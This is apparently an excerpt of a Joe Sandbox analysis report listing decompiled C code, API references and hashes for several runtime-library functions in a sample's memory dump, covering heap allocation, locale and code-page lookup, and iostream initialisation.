Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: c395313f89804cf125e1091bf9beafc9789f722cb682644e8354fc01c2773617
Instruction ID: 790c3b2fff3123b8fe90ba9c12e6dab86a9a14ffefde88999abc8948d8016906
Opcode Fuzzy Hash: c395313f89804cf125e1091bf9beafc9789f722cb682644e8354fc01c2773617
Instruction Fuzzy Hash: 09016DB76047166BD330CF69D88199AFB98FB563B0F150629F546A76C0E770AC10C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 001A3584 Relevance: 1.5, APIs: 1, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E001A3584(void* __ebx, intOrPtr* __ecx, void* __eflags) {
				void* _v5;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t16;
				void* _t17;
				char _t23;
				void* _t27;
				intOrPtr* _t32;
				intOrPtr _t33;

				_t32 = __ecx;
				_t16 = E001A58A2(1, 0xb8);
				_t31 =  *_t32;
				_t33 = _t16;
				 *((intOrPtr*)( *_t32)) = _t33;
				_t17 = E001A71B2(0);
				_t37 = _t33;
				if(_t33 != 0) {
					_v36 =  *_t32;
					_v32 =  *((intOrPtr*)(_t32 + 4));
					_v28 =  *((intOrPtr*)(_t32 + 8));
					_v24 =  *((intOrPtr*)(_t32 + 0xc));
					_v20 =  *((intOrPtr*)(_t32 + 0x10));
					_t23 = 4;
					_v12 = _t23;
					_v16 = _t23;
					_push( &_v12);
					_push( &_v36);
					_push( &_v16); // executed
					_t27 = E001A340A(__ebx, _t31, _t32, _t33, _t37); // executed
					return _t27;
				}
				return _t17;
			}

0x001a3595
0x001a3597
0x001a359c
0x001a359e
0x001a35a2
0x001a35a4
0x001a35ac
0x001a35ae
0x001a35b5
0x001a35bb
0x001a35c1
0x001a35c7
0x001a35cf
0x001a35d2
0x001a35d3
0x001a35d6
0x001a35dc
0x001a35e0
0x001a35e4
0x001a35e5
0x00000000
0x001a35e5
0x001a35ed

APIs

Part of subcall function 001A58A2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001A5F13,00000001,00000364,00000002,000000FF,?,?,00198B75,?), ref: 001A58E3

_free.LIBCMT ref: 001A35A4

Part of subcall function 001A71B2: HeapFree.KERNEL32(00000000,00000000,?,001AE36C,?,00000000,?,?,?,001AE60F,?,00000007,?,?,001AEB02,?), ref: 001A71C8
Part of subcall function 001A71B2: GetLastError.KERNEL32(?,?,001AE36C,?,00000000,?,?,?,001AE60F,?,00000007,?,?,001AEB02,?,?), ref: 001A71DA

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: bf681a7fe7f96d79fbd5c2e017d68d0acf400672a72af52789ca811215a5eb0a
Instruction ID: 616cae9b29aff9bff1dd0936058a3c225774c9445caef0feb75ed0f0af8a4df3
Opcode Fuzzy Hash: bf681a7fe7f96d79fbd5c2e017d68d0acf400672a72af52789ca811215a5eb0a
Instruction Fuzzy Hash: 7E0108B6E00219AFCB10DFA9C841B9EBBF8FB48710F104126EA14E7240E774EA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001A58A2 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E001A58A2(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x1f1124, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E001A4B32();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0019FD24(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E001A4B7D(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x001a58a8
0x001a58ad
0x001a58bb
0x001a58bb
0x001a58c1
0x001a58c3
0x001a58c3
0x001a58da
0x001a58e3
0x001a58eb
0x00000000
0x00000000
0x001a58cb
0x001a58cd
0x001a58ef
0x001a58f4
0x001a58fa
0x00000000
0x001a58fa
0x001a58d6
0x001a58d8
0x00000000
0x00000000
0x001a58d8
0x00000000
0x001a58da
0x001a58b3
0x001a58b9
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001A5F13,00000001,00000364,00000002,000000FF,?,?,00198B75,?), ref: 001A58E3

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 37240908d7859481b5e6e24cf09c4214bb01758645f41a02dbadb86510d82af7
Instruction ID: 14036fc0488216ab232e17e8d0f43ef6ca46eaa8cdffd03fbeed25e6eea33735
Opcode Fuzzy Hash: 37240908d7859481b5e6e24cf09c4214bb01758645f41a02dbadb86510d82af7
Instruction Fuzzy Hash: E5F0E93A20DA2467DB215B63DC05FAB379A9F83770B254031FD05E6094CB28DC00D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 001A9AF4 Relevance: 1.5, APIs: 1, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E001A9AF4(void* __eflags, intOrPtr* _a4) {
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr* _t22;

				 *0x1f0bc4 =  *0x1f0bc4 + 1;
				_t22 = _a4;
				_t11 = E001A58A2(0x1000, 1); // executed
				 *((intOrPtr*)(_t22 + 4)) = _t11;
				E001A71B2(0);
				if( *((intOrPtr*)(_t22 + 4)) == 0) {
					asm("lock or [eax], ecx");
					 *((intOrPtr*)(_t22 + 4)) = _t22 + 0x14;
					0x1000 = 2;
				} else {
					_push(0x40);
					asm("lock or [eax], ecx");
				}
				 *((intOrPtr*)(_t22 + 0x18)) = 0x1000;
				_t15 =  *((intOrPtr*)(_t22 + 4));
				 *(_t22 + 8) =  *(_t22 + 8) & 0x00000000;
				 *_t22 = _t15;
				return _t15;
			}

0x001a9af9
0x001a9b00
0x001a9b0c
0x001a9b13
0x001a9b16
0x001a9b25
0x001a9b34
0x001a9b3c
0x001a9b3f
0x001a9b27
0x001a9b27
0x001a9b2a
0x001a9b2a
0x001a9b40
0x001a9b43
0x001a9b46
0x001a9b4b
0x001a9b4f

APIs

Part of subcall function 001A58A2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001A5F13,00000001,00000364,00000002,000000FF,?,?,00198B75,?), ref: 001A58E3

_free.LIBCMT ref: 001A9B16

Part of subcall function 001A71B2: HeapFree.KERNEL32(00000000,00000000,?,001AE36C,?,00000000,?,?,?,001AE60F,?,00000007,?,?,001AEB02,?), ref: 001A71C8
Part of subcall function 001A71B2: GetLastError.KERNEL32(?,?,001AE36C,?,00000000,?,?,?,001AE60F,?,00000007,?,?,001AEB02,?,?), ref: 001A71DA

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: f1629cc82172bf91a7fb1bcdb130ff977e33f783f6a25541d784ff97127f490d
Instruction ID: 376746eef16af2285c556381630e99adfac90ca5fd9ecc76f60164d75cffbe71
Opcode Fuzzy Hash: f1629cc82172bf91a7fb1bcdb130ff977e33f783f6a25541d784ff97127f490d
Instruction Fuzzy Hash: 06F090725017009FD3359F45E802B52F7F8EF91B11F10842EE29A8B6E1D7B4E885CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0019635A Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0019635A(intOrPtr* __ecx, void* __edx, void* __esi, void* __eflags) {
				void* _t31;
				void* _t36;
				void* _t37;
				intOrPtr* _t39;
				void* _t40;

				_t36 = __edx;
				_push(8);
				E00198206(0x1b378f, _t31, _t37, __esi);
				_t39 = __ecx;
				 *((intOrPtr*)(_t40 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t40 - 0x10)) = 0;
				if( *((intOrPtr*)(_t40 + 0x10)) != 0) {
					 *__ecx = 0x1b43e0;
					 *((intOrPtr*)(__ecx + 0x10)) = 0;
					 *((intOrPtr*)(__ecx + 0x30)) = 0;
					 *((intOrPtr*)(__ecx + 0x34)) = 0;
					 *((intOrPtr*)(__ecx + 0x38)) = 0;
					 *((intOrPtr*)(__ecx + 8)) = 0x1b43d4;
					 *((intOrPtr*)(_t40 - 4)) = 0;
					 *((intOrPtr*)(_t40 - 0x10)) = 1;
				}
				 *((intOrPtr*)(_t39 +  *((intOrPtr*)( *_t39 + 4)))) = 0x1b43dc;
				_t16 =  *((intOrPtr*)( *_t39 + 4)) - 8; // -8
				 *((intOrPtr*)( *((intOrPtr*)( *_t39 + 4)) + _t39 - 4)) = _t16;
				E00196CB1(_t31,  *((intOrPtr*)( *_t39 + 4)) + _t39, _t36, _t37,  *((intOrPtr*)( *_t39 + 4)) + _t39,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc))); // executed
				return E001981D4(_t39);
			}

0x0019635a
0x0019635a
0x00196361
0x00196366
0x00196368
0x0019636d
0x00196373
0x00196375
0x0019637b
0x0019637e
0x00196381
0x00196384
0x00196387
0x0019638e
0x00196391
0x00196391
0x001963a3
0x001963af
0x001963b2
0x001963bd
0x001963c9

APIs

__EH_prolog3.LIBCMT ref: 00196361

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: d6ccbb7b2dbd4e879258ea1d50e95b97c72f09b57aa88bbcbbd5eb89d106fb1b
Instruction ID: e2018e156f7d1b2997887895670b6fe07fa28b9527dd5fc9657ae03d59723b94
Opcode Fuzzy Hash: d6ccbb7b2dbd4e879258ea1d50e95b97c72f09b57aa88bbcbbd5eb89d106fb1b
Instruction Fuzzy Hash: 8801C4B4900719CFCBA0DF68C640A5EBBF0BF18304B54892DE499DB711D7B1AA51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001A871A Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E001A871A(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0019FD24(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x1f1124, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E001A4B32();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E001A4B7D(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x001a8720
0x001a8726
0x001a8758
0x001a875d
0x001a8763
0x00000000
0x001a8763
0x001a872a
0x001a872c
0x001a872c
0x001a8743
0x001a874c
0x001a8754
0x00000000
0x00000000
0x001a8734
0x001a8736
0x00000000
0x00000000
0x001a873f
0x001a8741
0x00000000
0x00000000
0x001a8741
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00198B75,?,?,?,?,?,00191221,?,?), ref: 001A874C

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3ec2969cc2d6cb352c11c48e9479712b57e7c092460fe720772cce388f329482
Instruction ID: b0b9db38794cf528178937d13c4c20a52039ec52aee10d751f66621fd1e12e37
Opcode Fuzzy Hash: 3ec2969cc2d6cb352c11c48e9479712b57e7c092460fe720772cce388f329482
Instruction Fuzzy Hash: 0DE06D392412A56BEB352AF59C05B9B36DC9BA33A1F350124AE1996491DF70DC1086F1

Uniqueness

Uniqueness Score: -1.00%

Function 00196CB1 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00196CB1(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char _a8) {
				void* __esi;
				void* __ebp;
				short _t11;
				void* _t21;

				_t21 = __ecx;
				E001968D0(__ebx, __ecx, __edi, __ecx, __eflags);
				_t17 = __ecx;
				 *(__ecx + 0x3c) =  *(__ecx + 0x3c) & 0x00000000;
				 *((intOrPtr*)(__ecx + 0x38)) = _a4;
				_t11 = E00193749(__ebx, __ecx, __edx, __edi, 0x20); // executed
				 *((short*)(_t21 + 0x40)) = _t11;
				if( *((intOrPtr*)(_t21 + 0x38)) == 0) {
					_t17 = _t21;
					_push(0);
					_t11 = E00191C56(_t21,  *(_t21 + 0xc) | 0x00000004);
				}
				if(_a8 != 0) {
					return E00197B28(_t17, _t21);
				}
				return _t11;
			}

0x00196cb5
0x00196cb7
0x00196cbf
0x00196cc1
0x00196cc7
0x00196cca
0x00196cd3
0x00196cd7
0x00196cdc
0x00196cde
0x00196ce4
0x00196ce4
0x00196ced
0x00000000
0x00196cf5
0x00196cf8

APIs

std::ios_base::_Init.LIBCPMT ref: 00196CB7

Part of subcall function 001968D0: __EH_prolog3.LIBCMT ref: 001968D7
Part of subcall function 001968D0: std::locale::_Init.LIBCPMT ref: 00196920

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: Init$H_prolog3std::ios_base::_std::locale::_
String ID:
API String ID: 2854901245-0
Opcode ID: 2e151f5c99c5e53ef4394c4b0f1b05d9c0728dc12407adbdd56e02c9888651eb
Instruction ID: 4c9d6788f5facfdc70f373aab2feb20af852439bb0bf4a82dd9668e149cb573d
Opcode Fuzzy Hash: 2e151f5c99c5e53ef4394c4b0f1b05d9c0728dc12407adbdd56e02c9888651eb
Instruction Fuzzy Hash: A7F02B7050031467EF34AB62C549B5B77D8EF20770F00581EF48247681CBB5F840C7A4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001AFB10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E001AFB10(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E001A57CB(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x001afb15
0x001afb16
0x001afb1d
0x001afbc1
0x001afbda
0x001afbe0
0x001afbe5
0x001afbe7
0x001afbe7
0x001afbed
0x001afbf0
0x001afbf0
0x001afbdc
0x001afbdc
0x00000000
0x001afbdc
0x001afb23
0x001afb28
0x00000000
0x00000000
0x001afb2e
0x001afb33
0x001afb35
0x001afb35
0x001afb3b
0x00000000
0x00000000
0x001afb40
0x001afb57
0x001afb57
0x001afb60
0x001afb62
0x00000000
0x00000000
0x001afb64
0x001afb69
0x001afb6b
0x001afb6b
0x001afb71
0x00000000
0x00000000
0x001afb76
0x001afb94
0x001afb96
0x001afbb9
0x00000000
0x001afbbe
0x001afbb1
0x00000000
0x00000000
0x001afbb3
0x00000000
0x001afbb3
0x001afb78
0x001afb80
0x00000000
0x00000000
0x001afb82
0x001afb85
0x001afb8b
0x00000000
0x00000000
0x00000000
0x001afb8d
0x001afb8f
0x001afb91
0x00000000
0x001afb91
0x001afb42
0x001afb4a
0x00000000
0x00000000
0x001afb4c
0x001afb4f
0x001afb55
0x00000000
0x00000000
0x00000000
0x001afb55
0x001afb5b
0x001afb5d
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,001AFE2E,00000002,00000000,?,?,?,001AFE2E,?,00000000), ref: 001AFBA9
GetLocaleInfoW.KERNEL32(?,20001004,001AFE2E,00000002,00000000,?,?,?,001AFE2E,?,00000000), ref: 001AFBD2
GetACP.KERNEL32(?,?,001AFE2E,?,00000000), ref: 001AFBE7

Strings

OCP, xrefs: 001AFB64
ACP, xrefs: 001AFB2E

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: c2629f6b0e10fc2d3062258b74612ba4bb23b4796100a1d7ddd3747c20ebd985
Instruction ID: d2b386e702325c44bdcc46942e5ccc22b9ea247e6fb15bb0a9ba8fe6601898cf
Opcode Fuzzy Hash: c2629f6b0e10fc2d3062258b74612ba4bb23b4796100a1d7ddd3747c20ebd985
Instruction Fuzzy Hash: FC21D06A700104EADB348FA4C925BE772B6AB5AF60B56853CE90AD7100E732DD43C370

Uniqueness

Uniqueness Score: -1.00%

Function 001AFCE5 Relevance: 7.7, APIs: 5, Instructions: 183
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E001AFCE5(void* __ecx, void* __edx, void* __eflags, signed short _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t86;
				short* _t89;
				short** _t99;
				short* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0x1c3014; // 0x88921fa2
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E001A5D71(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E001A5D71(__ecx, __edx);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x1b8754; // 0x17
					E001AFC84(_t89, 0, 0x1b8640, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t97;
					if(__eflags == 0) {
						goto L19;
					}
					E001AF626(_t89, _t97, __eflags,  &_v20);
					_pop(_t89);
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0) {
						L8:
						E001AF70C(_t89, _t97, __eflags,  &_v20);
						L9:
						_pop(_t89);
						if(_v20 != 0) {
							_t100 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t101 = E001AFB10(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
							__eflags = _t101;
							if(_t101 == 0) {
								L22:
								_t53 = 0;
								L23:
								return E00197F14(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
							}
							_t55 = IsValidCodePage(_t101 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t101;
							}
							E001A85AA(_v16,  &(_v24[0x128]), 0x55, _t100);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							_t33 =  &(_t86[0x90]); // 0xd0
							E001A85AA(_v16, _t33, 0x55, _t100);
							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L22;
							}
							_t36 =  &(_t86[0x40]); // 0x30
							_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							_t38 =  &(_t86[0x80]); // 0xb0
							E001B21FE(_t38, _t101, _t38, 0x10, 0xa);
							goto L34;
						}
						_t73 =  *0x1b863c; // 0x41
						_t75 = E001AFC84(_t89, _t97, 0x1b8330, _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0) {
							L14:
							E001AF70C(_t89, _t97, __eflags,  &_v20);
							L15:
							_pop(_t89);
							goto L21;
						}
						_t118 =  *_t76;
						if( *_t76 == 0) {
							goto L14;
						}
						E001AF671(_t89, _t97, _t118,  &_v20);
						goto L15;
					}
					_t114 =  *_t70 - _t97;
					if( *_t70 == _t97) {
						goto L8;
					}
					E001AF671(_t89, _t97, _t114,  &_v20);
					goto L9;
				}
			}

0x001afced
0x001afcf4
0x001afcfb
0x001afcff
0x001afd03
0x001afd11
0x001afd16
0x001afd17
0x001afd18
0x001afd19
0x001afd21
0x001afd23
0x001afd29
0x001afd2f
0x001afd32
0x001afd34
0x001afd37
0x001afd3b
0x001afd42
0x001afd4f
0x001afd54
0x001afd57
0x001afd5a
0x001afd5a
0x001afd5c
0x001afd5f
0x001afd63
0x001afdd3
0x001afdd5
0x001afdd7
0x001afdea
0x001afdea
0x001afdf1
0x001afdf7
0x001afdfa
0x00000000
0x001afdfa
0x001afdd9
0x001afddc
0x00000000
0x00000000
0x001afde2
0x001afde7
0x00000000
0x001afd6a
0x001afd6a
0x001afd6e
0x001afd80
0x001afd84
